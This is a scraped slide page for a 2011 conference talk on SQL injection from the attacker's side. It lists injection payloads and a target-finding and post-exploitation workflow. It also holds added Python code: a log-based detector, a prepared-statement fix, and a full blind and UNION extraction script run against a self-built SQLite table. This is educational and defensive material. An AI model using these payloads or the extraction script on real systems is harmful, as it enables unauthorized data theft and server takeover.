It all starts with the '
(SQL injection from attacker's point of view)

Miroslav Štampar (dev@sqlmap.org)

What is SQL injection?

“SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution”
(source: msdn.microsoft.com)

FSec – FOI 2011, Varaždin (Croatia)        September 23, 2011   2
What is SQL injection? (2)
• In plain speak, SQL injection is (mostly) about unauthorized DBMS data access
• Only in special cases is it about data modification together with system takeover
• “Hello World” vulnerable code example (PHP/MySQL):

     // the raw GET parameter is concatenated straight into the SQL text, so a
     // request with "?id=1 OR 1=1" becomes "... WHERE id = 1 OR 1=1"
     $sql = "SELECT * FROM table_name WHERE id = " . $_GET["id"];
     $result = mysql_query($sql);

Well known cases
• Between 2005 and 2007 Albert Gonzalez stole 130 million credit card numbers
• June 2007 – Microsoft U.K. website defaced
• December 2009 – RockYou (32 million credentials stolen)
• December 2009 – NASA
• July 2010 – The Pirate Bay

Well known cases (2)
• February 2011 – HBGary (Anonymous)
• March 2011 – MySQL
• March & May 2011 – Comodo (certificate reseller)
• June 2011 – Sony, PBS (@LulzSec)
• August 2011 – Nokia
• September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, The National Geographic, UPS, Vodafone...)

Attackers' motivation

number of vulnerable sites collected × time spent on each site = const.

time spent on particular target / motivation = const.

(target = multiple (co)sites)

Attackers' profiles

1) Targeting easy targets, unfocused, fast pace, predictable behavior, blabbering, don't really care about the target (“script kiddies”)
2) Persistent, focused, slow motion, covert, silent, higher than average technical skills, highly motivated (money, extortion, fame) (“black hats”/“crackers”/“bad guys”)
3) For fun and knowledge, could warn you about the problem found, don't want to cause any damage (“gray hats”/“hackers”/“good guys”)

SQL injection techniques
• Boolean/Blind – AND 1=1, slow, 1 bit per request, based on page differentiation: a low difference ratio (against the original page) represents a True response, False otherwise (in the most common cases)
• Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of the subquery result(s) inside the DBMS error message
• Union/Inband – UNION ALL SELECT NULL,...,(<subquery>),NULL,NULL,..., fastest; in the FULL variant a whole table dump per request, in the PARTIAL variant 1 query result per request
SQL injection techniques (2)
• Time-based – AND 1=IF(2>1, BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0), slowest, 1 bit per request, a delay represents a True response, False otherwise
• Stacked – ;INSERT INTO users VALUES (10, 'test', 'testpass'), affecting mainly Microsoft SQL Server and PostgreSQL platforms, required for data modification, system access (e.g. xp_cmdshell) and UDF injection; there are also time- and error-based variants for data retrieval
• Other (DNS exfiltration, “Lateral”, Second order attacks, etc.)

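As an added illustration (not part of the original talk) of what the technique families above look like from the server side, this Python script classifies constructed access-log lines by the payload family they carry; the log lines, signature regexes and function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the talk); the query strings
# carry the payload families described on the slides above.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Sep/2011:10:00:01 +0200] "GET /item.php?id=5 HTTP/1.1" 200 1532
10.0.0.5 - - [23/Sep/2011:10:00:02 +0200] "GET /item.php?id=5' HTTP/1.1" 500 210
10.0.0.5 - - [23/Sep/2011:10:00:03 +0200] "GET /item.php?id=5%20AND%201=1--%20 HTTP/1.1" 200 1532
10.0.0.5 - - [23/Sep/2011:10:00:04 +0200] "GET /item.php?id=5%20AND%201=2--%20 HTTP/1.1" 200 987
10.0.0.5 - - [23/Sep/2011:10:00:05 +0200] "GET /item.php?id=5%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20 HTTP/1.1" 200 1610
10.0.0.5 - - [23/Sep/2011:10:00:06 +0200] "GET /item.php?id=5%20AND%201=IF(2%3E1,BENCHMARK(5000000,MD5(CHAR(97))),0) HTTP/1.1" 200 1532
10.0.0.5 - - [23/Sep/2011:10:00:12 +0200] "GET /item.php?id=5;IF(2%3E1)%20WAITFOR%20DELAY%20'0:0:5' HTTP/1.1" 200 1532
10.0.0.7 - - [23/Sep/2011:10:00:13 +0200] "GET /search.php?q=o'reilly HTTP/1.1" 200 2200
"""

# Common Log Format: client, identd, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# One signature per technique family from the slides, most specific first: a stacked
# query that also contains WAITFOR is reported as stacked, not merely time-based.
SIGNATURES = [
    ("stacked", re.compile(r";\s*(?:IF|SELECT|INSERT|UPDATE|DELETE|EXEC|WAITFOR)\b", re.I)),
    ("time-based", re.compile(r"\b(?:BENCHMARK\s*\(|WAITFOR\s+DELAY|GENERATE_SERIES\s*\(|SLEEP\s*\()", re.I)),
    ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("error-based", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("boolean", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
]


def classify_query(query):
    """Return the technique family matched by a URL-decoded query string, or None."""
    for name, pattern in SIGNATURES:
        if pattern.search(query):
            return name
    return None


def analyze_log(text):
    """Parse CLF lines and return one finding per request that looks like an SQLi attempt."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Servers log the raw URL; decode it so %20 / %3E do not hide the keywords.
        query = unquote_plus(m.group("path").partition("?")[2])
        status = int(m.group("status"))
        technique = classify_query(query)
        # A lone quote that produced a 5xx is the "contained DBMS error" the slides describe;
        # a quote inside a normal 200 response (o'reilly) is just data and is not reported.
        if technique is None and "'" in query and status >= 500:
            technique = "quote probe (DBMS error returned)"
        if technique is not None:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "technique": technique, "query": query,
                             "status": status, "size": int(m.group("size"))})
    return findings


def summarize(findings):
    """Map each client address to the sorted list of technique families it used."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["technique"])
    return {ip: sorted(techs) for ip, techs in by_ip.items()}


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['technique']:<36} {f['query']}")
    print(summarize(analyze_log(SAMPLE_LOG)))
```

The 1=1 / 1=2 pair with differing response sizes (1532 vs 987) is the page-differentiation signal the boolean/blind technique relies on, so a reviewer seeing both in one session has strong evidence the injection actually worked.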
Attacking phases
• Most SQL injection attacks can be dissected into the following phases:
    1) Searching for a vulnerable parameter (aka “injection point”)
    2) Fingerprinting the backend DBMS (for usage of proper payloads – e.g. error-based)
    3) Finding the fastest applicable technique (U>E>B>T=S)
    4) Enumeration (retrieving data of interest – e.g. usernames and passwords)
    5) Eventual post-exploitation (underlying OS access, data modification, web server takeover)

Attacking workflow (1)
• Finding a potential target – underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap -p 80), SHODAN (specialized computer search engine), “drive-by” (e.g. proxying of all casual everyday traffic), “hit-list”, etc.
• Manual web-browser based GET/POST parameter tampering with “poisonous” SQL characters (e.g. appending the character ' to the end of the original parameter value)

Attacking workflow (2)
• If the response contains a DBMS error, the attacker immediately proceeds with the “proper” (DBMS dependent) error-based payloads

Attacking workflow (3)
• Otherwise, the following step is the usage of common boolean based payloads (e.g. AND 1=1--%20, OR 1=1--%20, etc.)

Attacking workflow (4)
• Along the attacking line, the proper SQL injection prefix/suffix combination has to be “guessed”
• For example, different payloads are needed in the cases "SELECT * WHERE id='" . $_GET["id"] . "'" and "SELECT * WHERE id=('" . $_GET["id"] . "')"
• Adds one more dimension to the problem (more combinations)
• Most common prefixes are: <blank>, ', ", '), ")
• The problem of suffix finding can most often be circumvented by the usage of the generic comment form: --%20

Attacking workflow (5)
• If boolean/blind injection worked, there is a great possibility for union/inband
• Brute-force search for the proper column number
• ORDER BY as a fast column number finding technique
• Looking at whether it's a partial or full inband case
• Finding a usable (presented) column

Attacking workflow (6)
• If everything fails the attacker could proceed (high motivation required) with common time-based payloads and/or stacked queries
• Most commonly, this happens in INSERT/UPDATE/DELETE SQL injection cases (and when DBMS error messages are suppressed)
• Common payloads are: AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0), ;IF(2>1) WAITFOR DELAY '0:0:5', ;SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000), etc.

Attacking workflow (7)
• The enumeration phase consists of retrieving (“stealing”) data of interest:
    - Database and table names
    - Table dumps (e.g. users, admin, ...)
    - System stored usernames and password hashes
    - User privileges and roles
• Highly DBMS dependent (system database and table names, common function names, etc.)
• Usage of automated tools is highly preferable in boolean/blind and time-based techniques

Attacking workflow (8)
• Eventual post-exploitation is tightly bounded by the applicable SQL injection technique(s) and the current user's privileges
• Best/worst case scenario is the availability of the stacked technique along with “admin” privileges
• UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL xp_cmdshell()), etc.

Process automation

1) Web Application Assessment Proxy (optional) – BURP, WebScarab
2) Automatic SQL injection detection and exploitation tool – sqlmap, Havij, sqlninja
3) Second order exploitation framework – Metasploit (optional)

Introducing sqlmap
• “sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)”
• Unofficially, sqlmap is an AIO (All-In-One) SQL injection tool
• Over 10,000 repository updates and/or checkouts on a monthly basis
• Part of the most popular security distributions: Backtrack, Backbox, Web Security Dojo, OWASP Web Testing, ...

sqlmap capabilities
• Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB
• Fully supported SQL injection techniques: Boolean/Blind, Error-based, Union/Inband (partial & full), Time-based, Stacked
• Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc.

sqlmap capabilities (2)
• Automatic recognition and cracking of password hashes
• Support for IDS/WAF evasion in the form of “tampering” scripts
• Web server file upload/download
• Arbitrary OS command execution and retrieval of standard console output
• Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server (Metasploit, ICMPsh)

Closing words (for attackers)
• Learn SQL more than "well" – “SQL injection is 100% SQL. The rest is injection”
• Set up a (virtual) vulnerable environment entirely by yourself – for gaining a better mindset and possessing a LEGAL assessment testing machine
• Mimic with comprehension what other “attackers” do – including automated tools (e.g. sqlmap)
• Research defensive mechanisms – for advanced comprehension of the topic

Closing words (for defenders)
• Use (only) prepared SQL statements (bullet-proof against SQL injection attacks)
• Self-filtering procedures are prone to common “programmer's” mistakes (e.g. forgetting to hard type-cast the integer parameter value)
• Turn off DBMS error reports
• Run with least privilege (a non-admin “query” user)
• Always expect the worst scenario and set up accordingly (e.g. use the GRANT/REVOKE mechanism accordingly)
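Added example (not the talk's code) that stands in for the PHP/MySQL “Hello World” snippet from the beginning of the talk and for the defender advice above: a Python/sqlite3 port of the concatenating lookup beside its prepared-statement and integer type-cast variants, plus a handler wrapper showing the difference between echoing and suppressing the DBMS error. The table, its rows and all function names are constructed for the example.

```python
import sqlite3


def setup_db():
    """Constructed in-memory stand-in for the talk's MySQL 'table_name' (rows are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table_name (id INTEGER PRIMARY KEY, owner TEXT, secret TEXT)")
    conn.executemany("INSERT INTO table_name VALUES (?, ?, ?)",
                     [(1, "alice", "s1"), (2, "bob", "s2"), (3, "carol", "s3")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Same shape as the slide's PHP: the raw request parameter is glued into the SQL text."""
    sql = "SELECT * FROM table_name WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_prepared(conn, user_id):
    """Prepared statement: the value is bound as data and is never parsed as SQL."""
    return conn.execute("SELECT * FROM table_name WHERE id = ?", (user_id,)).fetchall()


def lookup_typecast(conn, user_id):
    """The slide's other advice: hard type-cast the integer parameter before it reaches the query.

    Anything that is not a plain integer is rejected (empty result here; a real handler
    would answer HTTP 400). This is the step self-filtering code tends to forget."""
    try:
        n = int(user_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT * FROM table_name WHERE id = " + str(n)).fetchall()


def handle_request(conn, lookup, user_id, verbose_errors=False):
    """Page-handler wrapper; verbose_errors=True models a site that echoes DBMS errors to the client."""
    try:
        return {"rows": lookup(conn, user_id)}
    except sqlite3.Error as exc:
        # "Turn off DBMS error reports": the first probe (a lone ') must not come back
        # with an error text that confirms the injection point and names the DBMS.
        return {"error": str(exc) if verbose_errors else "request failed"}


if __name__ == "__main__":
    conn = setup_db()
    hostile = "2 OR 1=1"
    print("vulnerable    :", lookup_vulnerable(conn, hostile))  # every row leaks
    print("prepared      :", lookup_prepared(conn, hostile))    # []
    print("type-cast     :", lookup_typecast(conn, hostile))    # []
    print("probe, verbose:", handle_request(conn, lookup_vulnerable, "2'", verbose_errors=True))
    print("probe, quiet  :", handle_request(conn, lookup_vulnerable, "2'"))
```

The least-privilege and GRANT/REVOKE points cannot be shown with sqlite3, which has no user accounts; on MySQL or PostgreSQL the same effect comes from running the application as a role that holds only SELECT on the tables it serves.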
Questions?




 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 

Kürzlich hochgeladen (20)

Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 

It all starts with the ' (SQL injection from attacker's point of view)

1. It all starts with the ' (SQL injection from attacker's point of view)
   Miroslav Štampar (dev@sqlmap.org)
   FSec – FOI 2011, Varaždin (Croatia), September 23, 2011

2. What is SQL injection?
   "SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution" (source: msdn.microsoft.com)

3. What is SQL injection? (2)
   - In plain speak, SQL injection is (mostly) about unauthorized DBMS data access
   - Only in special cases is it about data modification together with system takeover
   - "Hello World" vulnerable code example (PHP/MySQL), the user-supplied value concatenated straight into the query text:
       $sql = "SELECT * FROM table_name WHERE id = " . $_GET["id"];
       $result = mysql_query($sql);

4. Well known cases
   - Between 2005 and 2007 Albert Gonzalez stole 130 million credit card numbers
   - June 2007 – Microsoft U.K. website defaced
   - December 2009 – RockYou (32 million credentials stolen)
   - December 2009 – NASA
   - July 2010 – The Pirate Bay

5. Well known cases (2)
   - February 2011 – HBGary (Anonymous)
   - March 2011 – MySQL
   - March & May 2011 – Comodo (certificate reseller)
   - June 2011 – Sony, PBS (@LulzSec)
   - August 2011 – Nokia
   - September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, The National Geographic, UPS, Vodafone...)

6. Attackers' motivation
   number of vulnerable sites collected x time spent on each site = const.
   time spent on particular target / motivation = const.
   (target = multiple (co)sites)
7. Attackers' profiles
   1) Targeting easy targets, unfocused, fast pace, predictable behavior, blabbering, don't really care about the target ("script kiddies")
   2) Persistent, focused, slow motion, covert, silent, higher than average technical skills, highly motivated (money, extortion, fame) ("black hats"/"crackers"/"bad guys")
   3) For fun and knowledge, could warn you about the problem found, don't want to cause any damage ("gray hats"/"hackers"/"good guys")

8. SQL injection techniques
   - Boolean/Blind – AND 1=1; slow, 1 bit per request; based on page differentiation: a low difference ratio against the original page represents a True response, False otherwise (in most common cases)
   - Error-based – CONVERT(INT,(<subquery>)); fast, 1 (sub)query result per request; based on inclusion of the subquery result(s) inside the DBMS error message
   - Union/Inband – UNION ALL SELECT NULL,...,(<subquery>),NULL,NULL,...; fastest; in the FULL variant a whole table dump per request, in the PARTIAL variant 1 query result per request

9. SQL injection techniques (2)
   - Time-based – AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0); slowest, 1 bit per request; a delay represents a True response, False otherwise
   - Stacked – ;INSERT INTO users VALUES (10, 'test', 'testpass'); affects mainly Microsoft SQL Server and PostgreSQL platforms; required for data modification, system access (e.g. xp_cmdshell) and UDF injection; there are also time- and error-based variants for data retrieval
   - Other (DNS exfiltration, "lateral", second order attacks, etc.)
10. Attacking phases
   Most SQL injection attacks can be dissected into the following phases:
   1) Searching for a vulnerable parameter (aka "injection point")
   2) Fingerprinting the backend DBMS (to use the proper payloads – e.g. error-based)
   3) Finding the fastest applicable technique (U>E>B>T=S)
   4) Enumeration (retrieving data of interest – e.g. usernames and passwords)
   5) Eventual post-exploitation (underlying OS access, data modification, web server takeover)

11. Attacking workflow (1)
   - Finding a potential target – underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap -p 80), SHODAN (specialized computer search engine), "drive-by" (e.g. proxying of all casual everyday traffic), "hit-list", etc.
   - Manual web-browser based GET/POST parameter tampering with "poisonous" SQL characters (e.g. appending the character ' to the end of the original parameter value)

12. Attacking workflow (2)
   - If the response contains a DBMS error, the attacker immediately proceeds with the "proper" (DBMS-dependent) error-based payloads

13. Attacking workflow (3)
   - Otherwise, the next step is the usage of common boolean-based payloads (e.g. AND 1=1--%20, OR 1=1--%20, etc.)

14. Attacking workflow (4)
   - Along the way, the proper SQL injection prefix/suffix combination has to be "guessed"
   - For example, different payloads are needed for "SELECT * WHERE id='" . $_GET["id"] and for "SELECT * WHERE id=('" . $_GET["id"] . "')"
   - Adds one more dimension to the problem (more combinations)
   - Most common prefixes are: <blank>, ', ", '), ")
   - The problem of finding the suffix can most often be circumvented by using the generic comment form: --%20

15. Attacking workflow (5)
   - If boolean/blind injection worked, there is a good chance that union/inband works too
   - Brute-force search for the proper column number
   - ORDER BY technique for fast column-number finding
   - Checking whether it is a partial or a full inband case
   - Finding a usable (presented) column

16. Attacking workflow (6)
   - If everything fails, the attacker could proceed (high motivation required) with common time-based payloads and/or stacked queries
   - Most commonly this happens in INSERT/UPDATE/DELETE SQL injection cases (with DBMS error messages suppressed)
   - Common payloads are: AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0), ;IF(2>1) WAITFOR DELAY '0:0:5', ;SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000), etc.
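The workflow of slides 11 to 16 carried out end to end against a constructed target, as an added example that is not part of the presentation and not sqlmap's code. The target is an in-memory SQLite table sitting behind the same string concatenation as the slide 3 snippet, with DBMS error text suppressed so the attacker only sees rows or nothing; the table name, rows and all function names are assumptions. SQLite's unicode() and substr() stand in for MySQL's ORD() and SUBSTRING(). It walks the ' probe, the AND 1=1 / AND 1=2 boolean check, bit-per-request blind extraction, ORDER BY column counting, locating the presented column and a full union dump.

```python
import sqlite3

# Constructed target (assumption, not from the presentation): an in-memory SQLite
# table behind the same string concatenation as the slide 3 PHP snippet. Error
# messages are suppressed, as on slide 16, so only rows or "nothing" come back.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER, name TEXT, secret TEXT);
INSERT INTO users VALUES (1, 'alice', 's3cr3t');
INSERT INTO users VALUES (2, 'bob', 'hunter2');
""")


def vulnerable_lookup(user_input):
    """Vulnerable endpoint: `WHERE id = ` . $_GET["id"], nothing escaped.
    Returns the rows, or None when the DBMS raised an error."""
    try:
        return conn.execute("SELECT name FROM users WHERE id = " + user_input).fetchall()
    except sqlite3.Error:
        return None


def looks_injectable():
    """Slide 11/13 probes: an appended ' breaks the query, and AND 1=1 / AND 1=2
    give different pages (boolean differentiation), no error text needed."""
    baseline = vulnerable_lookup("1")
    quote_breaks = baseline is not None and vulnerable_lookup("1'") is None
    boolean_differs = (vulnerable_lookup("1 AND 1=1") == baseline
                       and vulnerable_lookup("1 AND 1=2") != baseline)
    return quote_breaks and boolean_differs


def oracle(condition):
    """Boolean oracle: True when the id=1 page still shows its row."""
    return bool(vulnerable_lookup("1 AND " + condition))


def blind_extract(subquery, max_len=64):
    """Boolean/blind technique (slide 8): one bit of one character per request.
    unicode()/substr() are SQLite's spelling of MySQL's ORD()/SUBSTRING().
    Returns (extracted string, number of requests spent)."""
    result, requests = "", 0
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(6, -1, -1):          # 7-bit ASCII, high bit first
            requests += 1
            if oracle(f"(unicode(substr(({subquery}),{pos},1)) >> {bit}) & 1 = 1"):
                code |= 1 << bit
        if code == 0:                          # past the end: substr() is '' -> NULL -> False
            break
        result += chr(code)
    return result, requests


def find_column_count(max_cols=16):
    """ORDER BY trick (slide 15): ORDER BY n errors out once n exceeds the number
    of columns the original SELECT returns."""
    for n in range(1, max_cols + 1):
        if vulnerable_lookup(f"1 ORDER BY {n}") is None:
            return n - 1
    return None


def find_presented_column(ncols):
    """Which UNION column actually reaches the page: put a marker in each position."""
    marker = "zzmarker"
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        rows = vulnerable_lookup("0 UNION ALL SELECT " + ", ".join(cols)) or []
        if any(marker in str(r) for r in rows):
            return i
    return None


def union_dump(column, table, ncols, presented):
    """Union/inband FULL variant (slide 8): a whole column of a table in one
    request. id = 0 matches nothing, so only the attacker's rows come back."""
    cols = ["NULL"] * ncols
    cols[presented] = column
    rows = vulnerable_lookup(f"0 UNION ALL SELECT {', '.join(cols)} FROM {table}") or []
    return [r[presented] for r in rows]


if __name__ == "__main__":
    print("injectable:", looks_injectable())
    print("blind:", blind_extract("SELECT secret FROM users WHERE name='alice'"))
    n = find_column_count()
    p = find_presented_column(n)
    print("columns:", n, "presented:", p)
    print("union:", union_dump("secret", "users", n, p))
```

The request counts make the U>E>B>T ordering of slide 10 concrete: the blind path spends 7 requests per character (49 for the six-character secret plus its terminator) while the union dump fetches every row of the column in a single request once the column count and the presented column are known.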
17. Attacking workflow (7)
   - The enumeration phase consists of retrieving ("stealing") data of interest:
     - Database and table names
     - Table dumps (e.g. users, admin, ...)
     - System-stored usernames and password hashes
     - User privileges and roles
   - Highly DBMS dependent (system database and table names, common function names, etc.)
   - Usage of automated tools is highly preferable for the boolean/blind and time-based techniques

18. Attacking workflow (8)
   - Eventual post-exploitation is strongly constrained by the applicable SQL injection technique(s) and the current user's privileges
   - Best/worst case scenario is the availability of the stacked technique along with "admin" privileges
   - UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL Server xp_cmdshell), etc.

19. Process automation
   1) Web application assessment proxy (optional) – Burp, WebScarab
   2) Automatic SQL injection detection and exploitation tool – sqlmap, Havij, sqlninja
   3) Second order exploitation framework – Metasploit (optional)
20. Introducing sqlmap
